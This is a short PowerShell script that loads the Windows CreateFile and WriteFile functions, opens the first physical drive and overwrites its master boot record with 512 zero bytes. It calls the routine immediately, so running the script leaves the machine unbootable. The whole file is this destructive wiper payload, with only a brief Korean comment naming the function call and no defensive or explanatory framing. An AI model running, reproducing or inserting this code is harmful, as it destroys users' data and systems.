$GenericRead = 0x80000000
$GenericWrite = 0x40000000
$GenericExecute = 0x20000000
$GenericAll = 0x10000000

$FileShareRead = 0x1
$FileShareWrite = 0x2

$OpenExisting = 0x3

$MbrSize = 512

$Signature = @"
[DllImport("kernel32")]
public static extern IntPtr CreateFile(
    string lpFileName,
    uint dwDesiredAccess,
    uint dwShareMode,
    IntPtr lpSecurityAttributes,
    uint dwCreationDisposition,
    uint dwFlagsAndAttributes,
    IntPtr hTemplateFile);
    
[DllImport("kernel32")]
public static extern bool WriteFile(
    IntPtr hFile,
    byte[] lpBuffer,
    uint nNumberOfBytesToWrite,
    out uint lpNumberOfBytesWritten,
    IntPtr lpOverlapped);
"@

Add-Type -MemberDefinition $Signature -Namespace better -Name MBR

function mbr_start {
    $mbrData = New-Object byte[] $MbrSize
    $mbr = [better.MBR]::CreateFile("\\.\PhysicalDrive0", $GenericAll, ($FileShareRead -bor $FileShareWrite),
        [IntPtr]::Zero, $OpenExisting, 0, [IntPtr]::Zero)
    $bytesWritten = 0
    [better.MBR]::WriteFile($mbr, $mbrData, $MbrSize, [ref]$bytesWritten, [IntPtr]::Zero)
}

# mbr_start 메서드 실행
mbr_start
